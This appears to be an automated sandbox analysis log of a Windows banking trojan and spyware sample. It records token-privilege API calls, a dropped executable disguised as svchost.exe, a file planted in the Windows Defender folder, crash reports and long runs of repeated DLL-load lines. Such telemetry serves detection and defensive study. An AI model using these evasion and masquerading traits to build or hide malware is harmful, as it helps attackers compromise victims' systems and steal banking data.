    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7256, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7232, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7212, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7188, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 344, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3964, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 1080, type: MEMORYSTR
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3872, type: MEMORYSTR
    Source: arxtPs1STE.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: svchost.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engine, Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@10/53@2130/24
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Code function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_00401E00
    Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_00401E00
    Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BD5930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_02BD5930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Code function: 5_2_008F5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_008F5930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Code function: 6_2_008A5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_008A5930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Code function: 9_2_02BF5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_02BF5930
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Code function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Code function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
    Source: C:\Windows\apppatch\svchost.exe, File created: C:\Program Files (x86)\Windows Defender\vojyqem.com
    Source: C:\Windows\apppatch\svchost.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\login[1].htm
    Source: C:\Windows\apppatch\svchost.exe, Mutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7212
    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7352
    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess344
    Source: C:\Windows\apppatch\svchost.exe, Mutant created: \Sessions\1\BaseNamedObjects\9E938F4Aa
    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7304
    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3964
    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7328
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, File created: C:\Users\user\AppData\Local\Temp\A834.tmp
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: arxtPs1STE.exe, ReversingLabs: Detection: 84%
    Source: arxtPs1STE.exe, String found in binary or memory: -help
    Source: svchost.exe, String found in binary or memory: -help
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, File read: C:\Users\user\Desktop\arxtPs1STE.exe
    Source: unknown, Process created: C:\Users\user\Desktop\arxtPs1STE.exe "C:\Users\user\Desktop\arxtPs1STE.exe"
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 748
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 756
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 740
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 740
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 732
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 756
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Section loaded (in load order): apphelp.dll, opengl32.dll, winmm.dll, glu32.dll, vmhgfs.dll, netapi32.dll, samcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, mpclient.dll, version.dll, msasn1.dll, profapi.dll, kernel.appcore.dll, uxtheme.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, ntmarta.dll
    Source: C:\Windows\apppatch\svchost.exe, Section loaded (in load order): apphelp.dll, opengl32.dll, winmm.dll, glu32.dll, vmhgfs.dll, netapi32.dll, samcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, mpclient.dll, version.dll, msasn1.dll, profapi.dll, kernel.appcore.dll, uxtheme.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, winscard.dll, devobj.dll, sensapi.dll, iphlpapi.dll, dbghelp.dll, dnsapi.dll, wininet.dll, ntmarta.dll, iertutil.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, urlmon.dll, srvcli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, winsta.dll, symsrv.dll, samlib.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Section loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
